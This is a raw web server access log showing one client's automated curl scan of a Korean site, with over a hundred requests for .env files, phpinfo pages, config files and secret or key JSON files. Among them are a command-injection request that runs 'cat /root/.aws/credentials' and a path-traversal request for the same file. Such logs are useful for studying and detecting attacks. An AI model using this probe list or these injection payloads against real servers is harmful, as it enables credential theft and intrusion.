-[16/Feb/2026:15:09:59 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.php3" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.php.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/info.php.save.1" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/info.php_" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:00 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/_info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin_phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dbinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin_info.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:01 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/credentials" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/phpinfo.php.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:02 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/admin_phpinfo.php4" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/pinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:03 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.backup" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env_sample" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.old" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.www" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:04 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.docker/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.dev" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.example" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:05 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env_1" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.stage" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.pam_environment" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:06 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.environment" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.production" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.production.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:07 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.powenv" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.rbenv-gemsets" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.envs" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.docker" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:08 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.sample" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env_bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.development.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:09 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env-example" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.prod" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.docker.dev" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.test" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:10 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.list" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.ghc.environment" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:11 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/printenv" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.hsenv" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/environment" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:12 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/envrc" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.dev.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/environment.ts" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env_old" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:13 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.zshenv" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.development.sample" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.rbenv-version" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env-sample" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:14 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.prod.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.travis" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.test.sample" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.2" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:15 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.vscode/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:16 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/.env.local" [Client 185.177.72.38] [Length 35] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.txt" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.save" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:16 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/printenv.tmp" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.flaskenv" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.test.local" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.jenv-version" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:17 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.envrc" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.dist" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.sample.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:18 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env1" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.venv" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.prod.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.test.js" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:19 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.bak" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/env.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/config?cmd=cat%20/root/.aws/credentials" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:20 +0000] - - 403 - GET https www.hanmocnn.co.kr "/pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000" [Client 185.177.72.38] [Length 122] [Gzip 1.35] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:20 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/k8s/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/.env" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:21 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/public/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:22 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/web/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/server/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/client/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/frontend/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:23 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.development" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.staging" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.env.live" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:24 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/admin/config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api/config.php" [Client 185.177.72.38] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:25 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backend/config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/src/config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/database.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/mail.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:26 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/app.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/services.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/wp-config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:27 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/configuration.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/.aws/config" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/aws.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/sendgrid.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:28 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/mailgun.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/sendgrid.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/aws.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/api_keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:29 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/keys.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/secrets.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/secrets.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/private/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:30 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/dev/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/staging/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:31 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/production/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/laravel/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/config.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/config.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:32 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/test/phpinfo.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/backup/config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/private/config.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/settings.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:33 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/app/settings.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/settings.php" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/database.yml" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/config/database.json" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:34 +0000] - 404 404 - GET https www.hanmocnn.co.kr "/administrator/.env" [Client 185.177.72.38] [Length 125] [Gzip 1.34] [Sent-to 192.168.0.250] "curl/8.7.1" "-" -[16/Feb/2026:15:10:35 +0000] - 404 404 